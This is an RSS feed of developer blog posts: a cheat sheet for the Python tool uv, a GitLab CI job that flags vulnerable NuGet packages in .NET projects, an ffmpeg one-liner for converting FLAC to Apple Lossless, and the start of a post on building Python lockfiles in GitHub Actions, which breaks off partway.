<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Andrey Krisanov</title>
    <description>The latest articles on DEV Community by Andrey Krisanov (@akrisanov).</description>
    <link>https://dev.to/akrisanov</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/akrisanov"/>
    <language>en</language>
    <item>
      <title>uv: Cargo-like Python Tool That Replaces pipx, pyenv, and more</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Wed, 10 Sep 2025 10:53:39 +0000</pubDate>
      <link>https://dev.to/akrisanov/uv-cargo-like-python-tool-that-replaces-pipx-pyenv-and-more-543m</link>
      <guid>https://dev.to/akrisanov/uv-cargo-like-python-tool-that-replaces-pipx-pyenv-and-more-543m</guid>
      <description>&lt;h2&gt;
  
  
  Overview
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;uv&lt;/code&gt; is an end-to-end solution for managing &lt;a href="https://docs.astral.sh/uv/guides/projects/" rel="noopener noreferrer"&gt;Python projects&lt;/a&gt;, &lt;a href="https://docs.astral.sh/uv/guides/tools/" rel="noopener noreferrer"&gt;command-line tools&lt;/a&gt;, &lt;a href="https://docs.astral.sh/uv/guides/scripts/" rel="noopener noreferrer"&gt;single-file scripts&lt;/a&gt;, and even &lt;a href="https://docs.astral.sh/uv/guides/install-python/" rel="noopener noreferrer"&gt;Python itself&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Think of it as Python’s Cargo: a unified, cross‑platform tool that’s fast, reliable, and easy to use.&lt;/p&gt;

&lt;p&gt;This post is not a deep introduction to uv — many excellent articles already exist; instead, it’s a concise cheat sheet for everyday use.&lt;/p&gt;

&lt;h2&gt;
  
  
  Installation &amp;amp; Updates
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install&lt;/span&gt;
curl &lt;span class="nt"&gt;-LsSf&lt;/span&gt; https://astral.sh/uv/install.sh | sh

&lt;span class="c"&gt;# Update&lt;/span&gt;
uv self update
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Managing Python Versions
&lt;/h2&gt;

&lt;p&gt;Instead of juggling tools like pyenv, mise, asdf, or OS‑specific hacks, you can simply use uv:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# List available versions&lt;/span&gt;
uv python list

&lt;span class="c"&gt;# Install Python 3.13&lt;/span&gt;
uv python &lt;span class="nb"&gt;install &lt;/span&gt;3.13
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Works the same across all OSes&lt;/li&gt;
&lt;li&gt;No admin rights required&lt;/li&gt;
&lt;li&gt;Independent of system Python&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can also use &lt;a href="https://github.com/jdx/mise" rel="noopener noreferrer"&gt;mise&lt;/a&gt; alongside uv if you prefer a global version manager.&lt;/p&gt;

&lt;h2&gt;
  
  
  Projects &amp;amp; Dependencies
&lt;/h2&gt;

&lt;p&gt;Initialize a new project (creates a pyproject.toml automatically):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv init myproject or &lt;span class="c"&gt;# uv init -p 3.13 --name myproject&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;myproject
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Sync dependencies (similar to &lt;code&gt;pip install -r requirements.txt&lt;/code&gt;, but faster and more reliable):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv &lt;span class="nb"&gt;sync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Add dependencies:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv add litestar
uv add pytest &lt;span class="nt"&gt;--dev&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Lock dependencies (generates a cross‑platform lockfile, like Pipfile.lock or poetry.lock):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv lock
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;💡 The lock file is cross platform, so you can develop on Windows and deploy on Linux.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Fast Virtual Environments
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create &amp;amp; activate venv automatically&lt;/span&gt;
uv venv
&lt;span class="nb"&gt;source&lt;/span&gt; .venv/bin/activate

&lt;span class="c"&gt;# Or skip activation and run directly with uv:&lt;/span&gt;
uv run python app.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Scripts
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create a new script&lt;/span&gt;
uv init &lt;span class="nt"&gt;--script&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# /// script
# requires-python = "&amp;gt;=3.13"
# dependencies = [
#     "requests",
# ]
# ///
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://akrisanov.com&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run single‑file scripts with automatic dependency installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv run script.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;💡  On *nix, add &lt;code&gt;#!/usr/bin/env -S uv run&lt;/code&gt; (then &lt;code&gt;chmod +x&lt;/code&gt;) to automatically call &lt;code&gt;uv run&lt;/code&gt; for a script.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Tools
&lt;/h2&gt;

&lt;p&gt;Install CLI tools globally, isolated from system Python:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;tool&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;ruff&lt;/span&gt; &lt;span class="c1"&gt;# replaces pipx
&lt;/span&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;tool&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;httpie&lt;/span&gt;

&lt;span class="n"&gt;uvx&lt;/span&gt; &lt;span class="n"&gt;httpie&lt;/span&gt; &lt;span class="c1"&gt;# a shortcut
&lt;/span&gt;
&lt;span class="c1"&gt;# --with [temp dependency] runs jupyter in the current project
# without adding it and its dependencies to the project
&lt;/span&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;jupyter&lt;/span&gt; &lt;span class="n"&gt;jupyter&lt;/span&gt; &lt;span class="n"&gt;notebook&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;💡 &lt;code&gt;uv&lt;/code&gt; run is fast enough that it implicitly re‑locks and re‑syncs the project each time, keeping your environment&lt;br&gt;
up to date automatically.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If you're developing a CLI tool, uv can help minimize the friction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv init &lt;span class="nt"&gt;--package&lt;/span&gt; your_tool
uv tool &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;See the &lt;a href="https://docs.astral.sh/uv/concepts/tools/" rel="noopener noreferrer"&gt;tools documentation&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Replacing pip-tools
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv pip compile &lt;span class="c"&gt;# replaces pip-tools compile&lt;/span&gt;
uv pip &lt;span class="nb"&gt;sync&lt;/span&gt;    &lt;span class="c"&gt;# replaces pip-tools sync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Building and publishing packages
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build a `.whl` package for PyPI&lt;/span&gt;
uv build
&lt;span class="c"&gt;# Upload your Python package to PyPI&lt;/span&gt;
uv publish
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Pre-commit hooks
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv run &lt;span class="nt"&gt;--with&lt;/span&gt; pre-commit-uv pre-commit run &lt;span class="nt"&gt;--all-files&lt;/span&gt;
pre-commit-uv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  GitHub Actions
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="s"&gt;astral-sh/setup-uv&lt;/span&gt; &lt;span class="c1"&gt;# brings UV to GitHub Actions&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Docker
&lt;/h2&gt;

&lt;p&gt;Official Docker images provide uv and Python preinstalled:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;ghcr.io/astral-sh/uv:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Also, check [Production-ready Python Docker Containers with uv (&lt;a href="https://hynek.me/articles/docker-uv/" rel="noopener noreferrer"&gt;https://hynek.me/articles/docker-uv/&lt;/a&gt;) by Hynek Schlawack.&lt;/p&gt;

&lt;h2&gt;
  
  
  Workspaces
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;uv&lt;/code&gt; supports organizing one or more packages into a &lt;a href="https://docs.astral.sh/uv/concepts/projects/workspaces/" rel="noopener noreferrer"&gt;workspace&lt;/a&gt; to manage them together.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Example&lt;/em&gt;: you might have a FastAPI web application alongside several libraries, all versioned and maintained as separate Python packages in the same Git repository.&lt;/p&gt;

&lt;p&gt;In a workspace, each package has its own &lt;code&gt;pyproject.toml&lt;/code&gt;, but the workspace shares a single lockfile, ensuring that the workspace operates with a consistent set of dependencies.&lt;/p&gt;

&lt;h2&gt;
  
  
  Things to Keep in Mind
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;uv sync&lt;/code&gt; respects &lt;code&gt;.python-version&lt;/code&gt;, but the &lt;code&gt;UV_PYTHON&lt;/code&gt; environment variable takes precedence&lt;/li&gt;
&lt;li&gt;Uses python‑build‑standalone, which can be slightly slower than system builds (~1–3%) and lacks CPU‑specific optimizations&lt;/li&gt;
&lt;li&gt;Cache size can grow large (a trade‑off for speed and reliability)&lt;/li&gt;
&lt;li&gt;Legacy projects may fail if they depended on pip’s older, looser dependency resolution rules&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Why uv Matters
&lt;/h2&gt;

&lt;p&gt;Python has always had a fragmented ecosystem of tools: pip, pip-tools, virtualenv, venv, pipx, pyenv, poetry, tox…&lt;/p&gt;

&lt;p&gt;With uv, we finally get something closer to Rust’s Cargo or JavaScript’s npm/pnpm: a single, consistent, cross‑platform tool for environments, dependencies, scripts, and tools — and it’s fast.&lt;/p&gt;

&lt;h2&gt;
  
  
  References &amp;amp; Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://docs.astral.sh/uv/concepts/projects/dependencies/#dependency-sources" rel="noopener noreferrer"&gt;Dependency Sources&lt;/a&gt;
— explains how uv resolves dependencies&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.pecar.me/uv-with-django" rel="noopener noreferrer"&gt;UV with Django&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://peps.python.org/pep-0723/" rel="noopener noreferrer"&gt;PEP 723 – Inline script metadata&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/astral-sh/uv/issues/5903" rel="noopener noreferrer"&gt;WIP: Using uv run as a task runner&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Additional Notes
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;While some people don’t care about uv being fast, it’s shaved minutes off CI builds and container rebuilds — saving money and energy.&lt;/li&gt;
&lt;li&gt;Astral capitalized on a very promising project called &lt;a href="https://github.com/astral-sh/python-build-standalone" rel="noopener noreferrer"&gt;python-build-standalone&lt;/a&gt; and now maintains it. These are Python builds that work without installers.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;a href="https://akrisanov.com/uv/" rel="noopener noreferrer"&gt;Originally published&lt;/a&gt; on akrisanov.com&lt;/p&gt;

</description>
      <category>python</category>
      <category>tooling</category>
      <category>uv</category>
    </item>
    <item>
      <title>Identifying Vulnerable Dependencies In .NET Projects</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Tue, 07 May 2024 00:00:00 +0000</pubDate>
      <link>https://dev.to/akrisanov/identifying-vulnerable-dependencies-in-net-projects-3lba</link>
      <guid>https://dev.to/akrisanov/identifying-vulnerable-dependencies-in-net-projects-3lba</guid>
      <description>&lt;p&gt;Some time ago, I was working in a company that was building a SaaS that was written in .NET. The code base was a decade old, and like many companies using Microsoft technologies, it had been through a few framework upgrades. The intent was to move to modern technologies and refactor outdated components, but the execution was rather poor. By the time I put on my engineering manager's hat, many of the NuGet packages in the solution were out of date and even deprecated.&lt;/p&gt;

&lt;p&gt;In Python and Go projects, I rely heavily on linting, static analysis, and formatting tools. Not having these essentials would make me and my teams less productive. So the first thing I did was understand what modern .NET brings to the table in this area. And I started by scanning the NuGet packages we use in all of our projects in a single solution for potential vulnerabilities.&lt;/p&gt;

&lt;p&gt;It turned out that developers could simply run &lt;code&gt;dotnet list package --vulnerable&lt;/code&gt; locally to keep an eye on security. But without automation, it's too easy to forget about that.&lt;/p&gt;

&lt;p&gt;My first local scan produced the following result:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...
Project `X.Infrastructure.Calendar` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   &amp;gt; System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

The given project `X.Infrastructure.Common` has no vulnerable packages given the current sources.
Project `X.Infrastructure.Currency` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   &amp;gt; System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

Project `X.Infrastructure.Locker` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   &amp;gt; System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

The given project `X.Infrastructure.Locker.Tests.Unit` has no vulnerable packages given the current sources.
The given project `X.Infrastructure.Pool` has no vulnerable packages given the current sources.
Project `X.Infrastructure.Repositories` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   &amp;gt; System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

The given project `X.Infrastructure.Rules` has no vulnerable packages given the current sources.
...

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see, there are several projects vulnerable to &lt;a href="https://devhub.checkmarx.com/cve-details/CVE-2022-41064/" rel="noopener noreferrer"&gt;CVE-2022-41064&lt;/a&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;.NET Framework System.Data.SqlClient versions prior to 4.8.5 and Microsoft.Data.SqlClient versions prior to 1.1.4 and 2.0.0 prior to 2.1.2 is vulnerable to Information Disclosure Vulnerability.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;To get rid of the issue, it's enough to upgrade the package:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;dotnet add package System.Data.SqlClient -v 4.8.6

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, how can developers prevent such situations? You already know the answer: automation!&lt;/p&gt;

&lt;p&gt;After sharing my observations with the team, I created a merge request with a new GitLab pipeline that runs for every open merge request and master branch.&lt;/p&gt;

&lt;p&gt;These are the changes in the &lt;code&gt;.gitlab-ci.yml&lt;/code&gt; manifest:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;stages:
  - security

vulnarable-dependencies:
  stage: security
  image: mcr.microsoft.com/dotnet/sdk:6.0-bullseye-slim
  before_script:
    - dotnet restore
  script:
    - dotnet list package --vulnerable 2&amp;gt;&amp;amp;1 | tee vulnerable-packages.log
    - &amp;gt;-
      ! grep -qiw "critical\|high\|moderate\|low" vulnerable-packages.log;
      if [$? -ne 0]; then
        echo "🚨 Found vulnarable packages";
        exit 1
      else
        exit 0
      fi
  artifacts:
    when: always
    expire_in: 12h
    paths:
      - vulnerable-packages.log
  only:
    - master
    - merge_requests
  tags:
    - docker

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The pipeline will fail if any of the projects in the solution have vulnerable packages. The downloadable log file contains the list of vulnerabilities and their severity.&lt;/p&gt;

&lt;p&gt;This way, the team is always aware of the state of the dependencies and can take action to fix them.&lt;/p&gt;

&lt;p&gt;References:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://devblogs.microsoft.com/nuget/how-to-scan-nuget-packages-for-security-vulnerabilities/" rel="noopener noreferrer"&gt;How to Scan NuGet Packages for Security Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>Convert Flac to Apple Lossless With FFmpeg</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Sun, 22 Oct 2023 22:17:02 +0000</pubDate>
      <link>https://dev.to/akrisanov/convert-flac-to-apple-lossless-with-ffmpeg-4mbn</link>
      <guid>https://dev.to/akrisanov/convert-flac-to-apple-lossless-with-ffmpeg-4mbn</guid>
      <description>&lt;p&gt;I'm a longtime Apple Music user. Most of my so-called music collection is on the streaming service. However, I occasionally buy rare or remastered releases ripped from CDs. These releases are usually in the FLAC format, which Apple Music doesn't support. But I've found an easy workaround that allows me to organize and play albums on the go.&lt;/p&gt;

&lt;p&gt;The centerpiece of the workaround is FFmpeg. So if you don't already have it installed, it's worth installing now:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;brew &lt;span class="nb"&gt;install &lt;/span&gt;ffmpeg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Homebrew Formula&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;When the tool is ready to use, navigate to the folder containing the FLAC files and run the following script:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;for &lt;/span&gt;file &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;.flac&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;ffmpeg &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;-acodec&lt;/span&gt; alac &lt;span class="nt"&gt;-vcodec&lt;/span&gt; copy &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="nb"&gt;basename&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; .flac&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="s2"&gt;.m4a"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;mkdir &lt;/span&gt;flac&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;mkdir &lt;/span&gt;alac&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;for &lt;/span&gt;file &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;.flac&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;&lt;span class="nb"&gt;mv&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="s2"&gt;"flac/"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;for &lt;/span&gt;file &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;.m4a&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;&lt;span class="nb"&gt;mv&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="s2"&gt;"alac/"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Silly One-liner Converting FLAC to ALAC&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8RmCmfLi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.26.25.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8RmCmfLi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.26.25.png" alt="" width="800" height="621"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Susumu Hirasawa – Siren [Limited Edition]&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The bash script converts the audio to the Apple Lossless format (&lt;code&gt;*.m4a&lt;/code&gt;) and moves the files to the &lt;code&gt;alac&lt;/code&gt; directory:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5j6x8Oy_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.27.10.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5j6x8Oy_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.27.10.png" alt="" width="800" height="763"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Finally, the &lt;code&gt;alac&lt;/code&gt; directory can be dragged to Apple Music to import the album and upload its tracks to the cloud.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NcQMu0YQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.27.41.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NcQMu0YQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.27.41.png" alt="" width="800" height="473"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;The Uploaded Album&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;👉 You probably wonder why this album has no Lossless icon in Apple Music. Well, it turns out the audio quality of the FLAC files wasn't on pair with lossless. So, make sure releases you buy or rip, have a proper audio codec and quality.&lt;/p&gt;

</description>
      <category>music</category>
      <category>apple</category>
    </item>
    <item>
      <title>Generating A Lockfile For Python Project Using Github Actions</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Thu, 12 Oct 2023 21:21:49 +0000</pubDate>
      <link>https://dev.to/akrisanov/generating-a-lockfile-for-python-project-using-github-actions-275d</link>
      <guid>https://dev.to/akrisanov/generating-a-lockfile-for-python-project-using-github-actions-275d</guid>
      <description>&lt;p&gt;If you're working on a project that needs to be packaged for a specific environment other than your machine, the CI/CD server is your best friend. Products like Github Actions can save you time and the hassle of building dependencies you won't use in development.&lt;/p&gt;

&lt;p&gt;For example, many developers love Mac computers, especially the ones that come with Apple silicon. The sad truth is that we rarely deploy our code on servers with these processors and MacOS. Most of the time, projects run on Linux. Unfortunately, Python can't guarantee a deterministic or reproducible environment.&lt;/p&gt;

&lt;p&gt;Running the command to create a list of all the dependencies that your package will need gives a different result on MacOS, Linux, Windows, and so on:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip-compile &lt;span class="nt"&gt;--allow-unsafe&lt;/span&gt; &lt;span class="nt"&gt;--generate-hashes&lt;/span&gt; &lt;span class="nt"&gt;--no-emit-index-url&lt;/span&gt; &lt;span class="nt"&gt;--output-file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;requirements-lock.txt &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; requirements-lock.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Using pip-tools to compile a requirements.txt file from your dependencies&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Not all dependencies have universal wheels. Moreover, users can install different Python versions.&lt;/p&gt;

&lt;p&gt;Now that you see the problem, let's take a quick look at possible solutions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Build requirements-lock.txt&lt;/span&gt;

&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;workflow_dispatch&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
